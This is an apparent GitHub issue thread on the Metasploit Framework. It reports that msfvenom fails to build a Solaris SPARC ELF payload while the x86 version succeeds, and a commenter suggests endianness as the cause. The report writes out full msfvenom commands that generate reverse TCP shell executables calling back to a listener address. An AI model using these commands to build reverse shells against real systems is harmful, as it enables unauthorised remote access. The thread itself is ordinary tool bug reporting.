### ISSUE TITLE
msfvenom -a sparc -f elf fails

### ISSUE THREAD

**Issue by Ill-ithid** [rapid7/metasploit-framework#10958]
## Steps to reproduce
run:
`msfvenom -p solaris/sparc/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4448 --platform Solaris -b "\x00" -a sparc -f elf -o ~/share/solaris_shell_sparc
`
results in:
```Found 2 compatible encoders<br>
Attempting to encode payload with 1 iterations of generic/noneMbr>
generic/none failed with Encoding failed due to a bad character (index=65, char=0x00)
Attempting to encode payload with 1 iterations of sparc/longxor_tag
sparc/longxor_tag succeeded with size 196 (iteration=0)
sparc/longxor_tag chosen with final size 196
Payload size: 196 bytes
Error: The payload could not be generated, check options
```

No output file is generated.

The corresponding command for x86:
`msfvenom -p solaris/x86/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4449 --platform Solaris -b "\x00" -a x86 -f elf -o ~/share/solaris_shell_x86`

results in a successful generation:

```Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 118 (iteration=0)
x86/shikata_ga_nai chosen with final size 118
Payload size: 118 bytes
Final size of elf file: 202 bytes

Saved as: /home/user/share/solaris_shell_x86
```
## Expected behavior

msfvenom should generate an elf file, as the executable format used by Solaris on Sparc.

## Current behavior
Payload generates, but outputting to elf format fails.
No output is generated, the error message `"Error: The payload could not be generated, check options" ` is displayed.

### Metasploit version
`msfvenom --version: version unknown`

### I installed Metasploit with:
- [ ] Kali package via apt

### OS

What OS are you running Metasploit on?

Ubuntu-16.04.01

**Comment by 0x303** [comment]
Could this error be because Solaris SPARC is a Big Endian system, whereas x86, x86_64, amd64, and all others people are generally running msfvenom on are Little Endian? 

I am not sure if it is possible to generate a Big Endian executable on a Little Endian system.
